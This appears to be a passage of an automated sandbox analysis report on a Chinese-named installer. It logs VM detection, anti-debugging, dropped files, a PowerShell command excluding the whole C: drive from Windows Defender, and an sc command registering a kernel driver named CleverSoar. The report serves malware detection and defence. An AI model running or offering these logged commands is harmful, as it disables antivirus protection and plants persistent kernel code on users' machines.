Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6596Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3178Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpWindow / User API: threadDelayed 644Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpWindow / User API: threadDelayed 567Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpWindow / User API: threadDelayed 604Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-8UMQQ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0BAEC0 FindFirstFileA,FindClose,7_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00567496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00569C60 GetSystemInfo,11_2_00569C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2174346795.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2174346795.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6BF43886 NtSetInformationThread 00000000,00000011,00000000,000000007_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C0D0181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_005E57D0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0D9D35 mov eax, dword ptr fs:[00000030h]7_2_6C0D9D35
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0D9D66 mov eax, dword ptr fs:[00000030h]7_2_6C0D9D66
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0CF17D mov eax, dword ptr fs:[00000030h]7_2_6C0CF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0C8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C0C8CBD
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C0D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C0D0181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.13.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C197700 cpuid 7_2_6C197700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
